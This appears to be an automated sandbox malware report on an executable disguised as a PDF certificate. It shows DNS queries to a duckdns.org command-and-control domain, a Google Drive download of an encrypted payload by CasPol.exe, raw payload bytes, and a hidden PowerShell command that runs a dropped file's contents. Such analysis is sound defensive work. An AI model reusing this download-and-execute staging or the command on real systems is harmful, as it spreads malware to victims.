Jul 5, 2024 07:31:56.022974014 CEST	1.1.1.1	192.168.11.20	0x9a44	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:31:56.144224882 CEST	1.1.1.1	192.168.11.20	0x1d8f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:00.266102076 CEST	1.1.1.1	192.168.11.20	0xb18c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:00.387382984 CEST	1.1.1.1	192.168.11.20	0x987	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:04.514986992 CEST	1.1.1.1	192.168.11.20	0xf409	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:08.639142036 CEST	1.1.1.1	192.168.11.20	0x8a1c	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:08.759867907 CEST	1.1.1.1	192.168.11.20	0xb7ed	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:12.893454075 CEST	1.1.1.1	192.168.11.20	0xd9ff	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:17.027951956 CEST	1.1.1.1	192.168.11.20	0xd7c7	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:17.149874926 CEST	1.1.1.1	192.168.11.20	0x819a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:21.288794041 CEST	1.1.1.1	192.168.11.20	0x1f6f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:21.408771038 CEST	1.1.1.1	192.168.11.20	0x1fb3	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:25.561734915 CEST	1.1.1.1	192.168.11.20	0x7bd6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:29.699347973 CEST	1.1.1.1	192.168.11.20	0x5f10	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:29.820144892 CEST	1.1.1.1	192.168.11.20	0x576d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:33.945964098 CEST	1.1.1.1	192.168.11.20	0xac6f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:38.070930004 CEST	1.1.1.1	192.168.11.20	0xeb4d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:38.191984892 CEST	1.1.1.1	192.168.11.20	0x83d6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:42.320624113 CEST	1.1.1.1	192.168.11.20	0x2e3f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:42.443253994 CEST	1.1.1.1	192.168.11.20	0x34e1	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:46.568366051 CEST	1.1.1.1	192.168.11.20	0x2693	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:50.693263054 CEST	1.1.1.1	192.168.11.20	0xa748	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:50.814826965 CEST	1.1.1.1	192.168.11.20	0x628e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:54.942631006 CEST	1.1.1.1	192.168.11.20	0x4e3f	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:59.066215992 CEST	1.1.1.1	192.168.11.20	0x7695	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:32:59.186934948 CEST	1.1.1.1	192.168.11.20	0xcae0	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:03.314929008 CEST	1.1.1.1	192.168.11.20	0xa50e	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:03.435060024 CEST	1.1.1.1	192.168.11.20	0xea81	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:07.571460009 CEST	1.1.1.1	192.168.11.20	0xbae4	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:11.704462051 CEST	1.1.1.1	192.168.11.20	0x48ec	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:11.824981928 CEST	1.1.1.1	192.168.11.20	0xceb9	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:15.953139067 CEST	1.1.1.1	192.168.11.20	0x7b3b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:20.079240084 CEST	1.1.1.1	192.168.11.20	0x8a42	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:20.200072050 CEST	1.1.1.1	192.168.11.20	0x2637	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:24.330147028 CEST	1.1.1.1	192.168.11.20	0xc014	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:24.473052979 CEST	1.1.1.1	192.168.11.20	0xee0	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:28.606885910 CEST	1.1.1.1	192.168.11.20	0x1ea6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:32.730272055 CEST	1.1.1.1	192.168.11.20	0x9542	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:32.850589037 CEST	1.1.1.1	192.168.11.20	0x5f65	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:41.698071957 CEST	1.1.1.1	192.168.11.20	0x26dc	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:41.824421883 CEST	1.1.1.1	192.168.11.20	0xba7b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:45.946624994 CEST	1.1.1.1	192.168.11.20	0x399a	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:50.070390940 CEST	1.1.1.1	192.168.11.20	0xeefb	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:50.191128969 CEST	1.1.1.1	192.168.11.20	0xdc6	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:54.323664904 CEST	1.1.1.1	192.168.11.20	0x4770	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:54.444036961 CEST	1.1.1.1	192.168.11.20	0xb40b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:33:58.568097115 CEST	1.1.1.1	192.168.11.20	0x6d5d	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:02.692255020 CEST	1.1.1.1	192.168.11.20	0x4e3b	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:02.813441038 CEST	1.1.1.1	192.168.11.20	0x1a29	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:34:06.941401958 CEST	1.1.1.1	192.168.11.20	0x5bd7	Name error (3)	7fxcmft-olcmjfjxdk.duckdns.org	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49776	142.250.191.110	443	1072	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:26:12 UTC	216	OUT	GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Host: drive.google.com Cache-Control: no-cache
2024-07-05 05:26:12 UTC	1598	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 05 Jul 2024 05:26:12 GMT Location: https://drive.usercontent.google.com/download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-DyjMqX40D6PN0SGBIeG9ow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49777	142.250.191.129	443	1072	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:26:12 UTC	258	OUT	GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-07-05 05:26:13 UTC	4820	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="hgqRGiZKF90.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 207936 Last-Modified: Mon, 29 May 2023 21:04:30 GMT X-GUploader-UploadID: ACJd0Np94xsYyoumuP628_9phWC_YmkB0Kh1QFCg_8_qtwjbyAwWjuaIYCJeyRMR6maGwOxkdNg Date: Fri, 05 Jul 2024 05:26:13 GMT Expires: Fri, 05 Jul 2024 05:26:13 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=M8B4pQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-05 05:26:13 UTC	4820	IN	Data Raw: ef e3 5b 36 02 22 6a 1e fb 4d 01 08 d2 29 6e 69 82 89 75 e6 24 08 0e 21 04 0c 03 b7 81 34 70 d4 5b fb b6 f1 67 bf ac 98 44 52 a0 59 59 6c ab 41 b9 0b d0 b4 7d 1d 52 ab a9 3e 0b 75 f5 39 1c 12 67 b9 5b 0b 5a d1 2d f3 d1 de ed 8c 64 cb ae 4c f8 be 29 05 cd 39 81 aa a6 cc 32 3a 23 17 43 ee 2c 75 43 04 40 cc 9e 96 a0 0c a4 d5 d5 a6 e4 fc 34 3e e5 8f e4 c5 ca c9 3e a5 2b eb 79 ee ac 50 ed bb b3 a7 8c 43 65 b9 f2 5a 7b fc 83 4d d7 4b 18 b7 08 0e 5c f9 c2 38 43 80 71 65 78 d1 8a d4 44 1b a7 74 62 cc 11 3e 88 34 14 02 51 14 aa e2 75 67 d0 65 19 e8 af 1d 95 eb ea 1d 61 82 c1 21 27 ce 21 af 1f 01 f8 a0 1c 92 84 21 f8 a8 32 02 06 11 ee b4 ee b8 53 7a 2a 97 39 5a ff 07 16 1e d8 d5 cd b1 b0 93 18 48 50 0e de e9 e0 36 86 69 cf 81 0e c9 64 8b fa 99 18 c8 e6 01 0c a0 2d Data Ascii: [6"jM)niu$!4p[gDRYYlA}R>u9g[Z-dL)92:#C,uC@4>>+yPCeZ{MK\8CqexDtb>4Qugea!'!!2Sz*9ZHP6id-
2024-07-05 05:26:13 UTC	4820	IN	Data Raw: b3 3b c2 96 b5 0a b4 67 cc c7 3e ff 95 b9 0b 31 db aa 21 09 3b 15 c5 0b a8 dd 2e bc ff b1 b5 e1 ac 53 66 c9 95 66 2a 10 3c 6f 4a 76 36 f1 2b df 35 b8 34 80 a7 64 1b 5d 28 90 b1 0b 59 db 30 de fa f8 e5 e3 e0 34 ae 46 5e 93 01 23 df 39 88 82 87 cd 32 3c 3a 3a 5c c8 0a 67 43 0c 2f b0 9e 96 aa 71 23 d5 d5 a2 ed 93 4d 3e e5 85 e2 ce 14 d5 32 8e e4 e6 d2 38 d1 d8 e3 a4 0d 82 50 df 20 74 d3 e8 6b b4 45 44 e2 23 71 ce f6 7e 29 bc bd 9a 23 fd 51 06 19 bf ec bb 75 76 c5 1e 04 be 64 51 bb 6d 7e 22 45 5b f9 c2 03 08 b4 11 35 96 d8 17 b1 e1 f1 30 6a a4 c6 4e 0a 8b 21 a5 7e 07 d0 a3 b6 9e 9e 63 d2 af 5d 7e 06 11 e4 b7 20 ba 4b 51 26 f9 44 5a ff c5 0a 33 c5 91 c4 99 d1 92 18 4e db c4 c9 cf e8 79 ff 69 cf 8b 0a cd 72 a3 c4 99 18 e2 f0 ff 0d 88 21 f5 dd 85 9c d9 3f 2e 83 Data Ascii: ;g>1!;.Sff*<oJv6+54d](Y04F^#92<::\gC/q#M>28P tkED#q~)#QuvdQm~"E[50jN!~c]~ KQ&DZ3Nyir!?.
2024-07-05 05:26:13 UTC	238	IN	Data Raw: b4 c7 38 dd 56 b0 61 63 ce 80 2d 1c f0 20 eb 00 a5 1f 38 de ad 47 b9 c0 7e 5a 6e 53 84 28 04 10 62 6b 4c 5e e9 f1 2b c4 48 7e ca 95 98 6c 0c 07 26 eb c2 85 ee e3 cf 2d cb fb c5 c0 9b 34 a4 47 47 9e a4 27 1d 27 a9 55 e6 cc 34 12 97 17 43 e8 04 14 43 04 4a 12 9e bc a1 1c a4 d5 d5 a6 f6 fc 67 5b e5 91 a2 c5 ca c8 2d 95 2d eb f8 ef ac 50 cd a4 09 b8 a4 99 6c 74 d5 f4 56 b9 68 6b ba d3 71 c4 28 55 2d 9d 8e bf 25 9e 96 06 19 b5 fd 81 e1 3b c5 11 64 af 61 23 60 5d 7a 28 09 61 33 c2 18 08 92 11 33 f4 a6 78 78 eb ea 17 0e 48 c1 21 7d 86 09 64 53 00 f1 88 cd b5 6d 73 f4 a1 3a 2a 77 11 ee b2 8e fd 5d 7b 25 e8 7a 5a ff cb 3f 37 d9 b7 ca a0 b4 82 1c 27 0b e9 df e3 8f dc 86 69 c5 92 05 d8 6d a3 91 98 18 ee f5 06 1d a5 Data Ascii: 8Vac- 8G~ZnS(bkL^+H~l&-4GG''U4CCJg[--PltVhkq(U-%;da#`]z(a33xxH!}dSms:*w]{%zZ?7'im
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: 3c d8 a6 f6 fb 31 2c 1f f6 b1 de 69 70 30 c7 d3 59 15 52 dd f6 49 b4 7d 77 a7 af 9c 49 3a fe c2 9d 58 6c 7b 6e 57 1b 6c 69 3b 41 87 69 c2 63 b5 8e 4b 64 98 39 9f 3b d7 78 fb f3 56 5d 15 97 31 99 b9 1d a3 6c d6 d3 c7 f5 a0 89 9b 3b ba 61 17 a1 db b5 db 58 9f c2 79 66 13 05 ad 93 12 41 aa 6d 63 53 5a 35 ed 9d 44 11 0c e3 d9 12 de ec f2 fb 4b 87 88 ae 72 93 72 ce 81 37 e4 c7 05 9f b9 c5 7a 18 e7 5a b1 11 9b e5 60 44 27 36 de 41 9c 43 09 2c 36 bb c2 24 b7 ba f9 70 27 d8 01 bf a8 ee 12 d1 85 3c 6d 6b 19 1e 6c a9 05 58 26 6c e7 68 fe 95 35 cf 39 7a 8d e6 2d fd 9c 17 44 c9 6a c6 ad bd de 89 3d 01 57 57 7a c7 1c 67 74 b2 0d 0c e0 f6 9a ff cf a4 cc 47 06 a8 53 7d c5 8e b3 49 3d 61 77 20 60 93 c1 35 27 3b 24 53 a4 d1 28 db 22 80 6f 53 ab 62 7c b6 4a 45 f2 dc 16 fa Data Ascii: <1,ip0YRI}wI:Xl{nWli;AicKd9;xV]1l;aXyfAmcSZ5DKrr7zZ`D'6AC,6$p'<mklX&lh59z-Dj=WWzgtGS}I=aw `5';$S("oSb\|JE
2024-07-05 05:26:13 UTC	68	IN	Data Raw: 2a 8c 19 80 7f ea f4 be 0c 6e 96 31 9e e5 50 89 12 ac c4 9e e6 d4 03 c1 af ba 60 02 80 cf 9b 5e 00 8c c2 42 61 02 03 bf a9 0d 50 b5 e3 d4 7b 96 35 ed 97 7d 27 25 8f df 3f d9 d7 d2 84 27 87 8e b0 48 bb 47 Data Ascii: *n1P`^BaP{5}'%?'HG
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: e1 9f 35 e7 38 fa 8c 83 d5 77 e6 18 a3 8a 3a b1 f2 48 d1 17 32 d8 07 8f 73 0d 03 19 ba d3 32 82 34 4e 76 56 fb 2d b8 88 cb 1b d6 a3 17 44 1a 32 e9 62 af fc 70 5e 8d 93 c3 fa b8 33 ab 25 61 ab e0 00 ef ba bd 6c 9b 6e dc 8a bc 86 c5 46 01 53 54 2c e0 1c 67 7e b5 16 2d c8 0c 99 26 b0 96 ca 6a 03 85 73 b0 97 8e b9 6b 68 ee 77 26 05 5e d0 4b 1f 21 09 46 85 f1 df 89 22 8a 63 25 0c 85 7c bc 46 70 95 fd 13 f8 40 e3 d4 70 cd 1c 80 f7 fc 33 c9 60 3c 9f c3 0a 18 2a c9 3c 4f 02 de 49 8a 3c bd 28 48 06 57 90 57 a8 50 d0 2d 6b 5a b8 13 aa 90 35 ed a5 0c e9 47 46 27 d7 ac 3f d7 ae 18 96 74 1a 87 66 81 04 e9 9c 43 e7 82 38 bf 6c 9e 31 2a bc bc 9a 79 0e 68 88 de a9 6d 73 a3 25 18 85 06 d5 31 2b 2f a9 92 21 8e d4 f8 7b fa e5 28 b2 e7 27 18 d6 01 fe 7c db d4 94 50 fa 4c 11 Data Ascii: 58w:H2s24NvV-D2bp^3%alnFST,g~-&jskhw&^K!F"c%\|Fp@p3`<<OI<(HWWP-kZ5GF'?tfC8l1yhms%1+/!{('\|PL
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: 5c 38 db df e5 f8 bd 73 d4 14 67 c4 62 2a ea c2 8b 44 d3 6b c6 a1 de 28 ba 3d 07 55 78 5c 4a 1c 61 11 e0 14 27 e5 fb 99 56 b0 96 ca 28 82 ae 5b 53 91 a6 f8 42 52 e9 18 a4 6b b8 d6 4d 3d 77 25 57 a5 b6 93 88 22 86 4d 70 25 62 7a 90 1d 76 a9 dc 3b 41 7f 19 fe 4a 38 4c ad e9 d4 c6 d5 4d 2e 91 34 47 19 20 a0 c6 4d 2a 2a 54 a7 23 b7 59 1c 00 5b bf bb 85 6b 1d 24 63 1d ca 13 aa 9c 31 ac 8f 0f e3 7e ad 27 f6 ac 3f d7 aa 9c 9f 7c 73 50 51 80 0e e9 ac a8 e7 83 38 b2 23 d8 13 fa a4 92 4f 79 0e 6e 95 81 44 6d ff a9 28 66 ba 06 d5 24 75 9d 8a 42 3b 8b 2a d2 53 fd cc c1 b8 e5 00 12 e0 3a d8 6b c5 d1 03 76 84 cb 37 9c 1a 51 09 7a 73 e9 1d 60 82 0a e0 90 c6 47 c7 48 34 9f 6a b3 91 7d 31 07 ff 45 dc 8f e6 f6 39 67 00 00 fe 73 01 82 13 a9 01 2e 93 41 3b 86 04 f5 5c 77 d0 Data Ascii: \8sgbDk(=Ux\Ja'V([SBRkM=w%W"Mp%bzv;AJ8LM.4G MT#Y[k$c1~'?\|sPQ8#OynDm(f$uB;S:kv7Qzs`GH4j}1E9gs.A;\w
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: 69 53 f3 77 20 6a b8 c4 4b 53 61 24 77 e5 d9 00 88 20 80 71 3c 42 18 7c b6 4c 5d aa d6 0b c3 6f 0e 5c 50 1e 3f 15 e9 d4 dd e1 f6 3a b7 1a 26 1d fd 24 d4 4f 02 aa 65 a7 29 9f 7e 27 07 57 9e 77 7d 40 f7 27 4d 0c 04 13 aa 92 31 73 8e 0f e3 41 b6 71 39 ac 3f d9 ae 91 97 74 16 87 8e 80 04 e5 db f6 e7 82 3c 90 5d 4c 12 f0 dc 86 64 79 04 10 a1 b1 41 69 64 c6 c5 66 fa 0c cf 18 18 c0 8c 3c 40 a6 2b fc 05 cd cd c1 b6 88 3e 10 f6 1b 07 5b d1 d7 f2 75 d2 06 37 9c 14 56 39 70 55 f4 15 d0 a7 da f8 a0 14 4d e1 49 0a 05 5b 98 91 5f 7b e3 f4 64 f6 ac 68 f9 0f 53 28 fe ee 73 07 85 9f e5 01 44 f8 69 43 c0 04 ff 2e 18 e0 c4 88 83 47 86 57 fa a7 f1 1e 46 7a 3a 24 89 a9 74 8a 4c 95 cb 76 e7 00 41 c5 af 8a 42 3e e8 7a 51 ec d4 10 73 96 8a 8a 61 92 57 1f c5 99 dd 37 fe b1 cb a4 Data Ascii: iSw jKSa$w q<B\|L]o\P?:&$Oe)~'Ww}@'M1sAq9?t<]LdyAidf<@+>[u7V9pUMI[_{dhS(sDiC.GWFz:$tLvAB>zQsaW7
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: 08 0a 58 8f 65 9b 56 3d 2e 36 94 5f 82 9e f7 07 68 7e 34 03 aa 96 19 e2 8e 0f 6c e5 af 03 4e ac 3f dc 95 ab 92 74 50 af 51 80 4d ef a5 d6 99 fc 38 b8 48 4f 32 6b 84 44 7b 51 f1 6e 8e b7 69 84 73 a9 22 4e 52 06 d5 3f 11 cb 81 64 39 8e 85 f8 7b f6 e0 ca 99 e4 27 3a 05 6f a6 7c db f6 33 56 d2 e5 37 9c 14 66 3f 69 73 f5 28 87 88 2c e1 9e 71 39 4a 4f 22 b0 71 93 bc 83 01 d3 f0 6e 66 af 63 d2 d7 79 28 ee 80 0d 07 85 9b e7 21 bf b4 b9 79 ae fb ff 2f 05 f8 29 88 18 4d ae ff bc a7 fb 11 15 61 1d 22 ab dd 5a 8a 46 4f fb 13 21 f5 64 e7 fb a7 53 12 f4 29 36 ca d3 34 fd df b4 94 49 67 7b 0f e8 b2 63 1c 13 b1 9d ba 57 2c 25 48 fe ad c7 0c d9 32 89 87 5e ff f7 1f 7e 65 48 dd dc 67 7e 69 17 ac 45 ff 46 c5 61 35 a0 0f 88 01 34 f5 39 dd 4d 9a c5 08 dc cc c5 94 e2 16 be 5c Data Ascii: XeV=.6_h~4lN?tPQM8HO2kD{Qnis"NR?d9{':o\|3V7f?is(,q9JO"qnfcy(!y/)Ma"ZFO!dS)64Ig{cW,%H2^~eHg~iEFa549M\
2024-07-05 05:26:13 UTC	1255	IN	Data Raw: 12 fa b3 97 0a 59 0f 6e 84 91 73 4b a3 b7 00 99 fa 06 d3 5a 2a e7 8a 48 13 8a 55 b5 7b fc c9 ec a5 99 1a 11 f6 15 f1 5e da fc 13 47 d7 49 11 b7 19 ce 59 68 73 f7 1e aa fc 47 e6 88 ef 54 cc 4c 04 6f 70 92 bc 8c c4 c7 d1 46 64 af 63 d8 f3 54 30 d9 f9 53 20 a3 4f fb 29 d1 92 69 61 ae b0 ff 2f 05 f8 a1 88 18 4d 58 54 b7 8c 17 1b 12 6e 11 fa 8d c5 5a 9a 4c 91 dc 19 0a 00 04 8a b7 83 15 18 ee 05 2d dc de 14 40 f9 64 8a 61 98 7b 0f ce 47 f0 cc 0d 9f 4a db 57 2a 2c 80 e8 8b fe cc f7 39 b4 ab 41 d9 df b2 7e 65 42 dc 40 67 5a 29 3d 8a 6f 08 50 ea 8e 9c bb 3f 8c 4b ae f5 28 a3 4a 9a c5 1d b4 da cc b2 e1 07 be 5c 98 a3 15 92 55 1f 9b e4 d6 1d 4b bd e8 d4 7b 9d 09 de 59 53 bb fe c0 37 80 f9 26 47 af 16 00 a8 75 a3 9b bb 08 69 b6 7a 8a c8 f4 1a a9 44 1b 3a 21 d8 ee a8 Data Ascii: YnsKZHU{^GIYhsGTLopFdcT0S O)ia/MXTnZL-@da{GJW,9A~eB@gZ)=oP?K(J\UK{YS7&GuizD:!

Target ID:	0
Start time:	01:25:03
Start date:	05/07/2024
Path:	C:\Users\user\Desktop\Certificate#U00b7pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Certificate#U00b7pdf.exe"
Imagebase:	0x400000
File size:	414'504 bytes
MD5 hash:	6DB7BB3D97AFA79630D4085427E93BDF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:25:08
Start date:	05/07/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas''
Imagebase:	0xf10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:25:08
Start date:	05/07/2024
Path:	C:\Windows\System32\conhost.exe
